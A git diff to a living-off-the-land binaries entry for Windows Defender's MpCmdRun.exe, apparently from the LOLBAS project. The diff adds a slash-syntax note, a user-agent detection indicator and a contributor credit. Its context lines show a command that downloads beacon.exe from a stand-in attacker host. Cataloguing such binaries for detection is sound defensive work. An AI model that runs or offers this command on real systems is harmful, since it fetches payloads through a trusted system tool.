diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 630d802..160c771 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -5,7 +5,7 @@ Author: 'Oddvar Moe' Created: '09/03/2020' Commands: - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe - Description: Download file to specified path + Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) Usecase: Download file Category: Download Privileges: User @@ -31,6 +31,7 @@ Detection: - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log + - IOC: User Agent is "MpCommunication" Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477 @@ -41,4 +42,6 @@ Acknowledgement: Handle: '@mohammadaskar2' - Person: Oddvar Moe Handle: '@oddvarmoe' + - Person: RichRumble + Handle: '' ---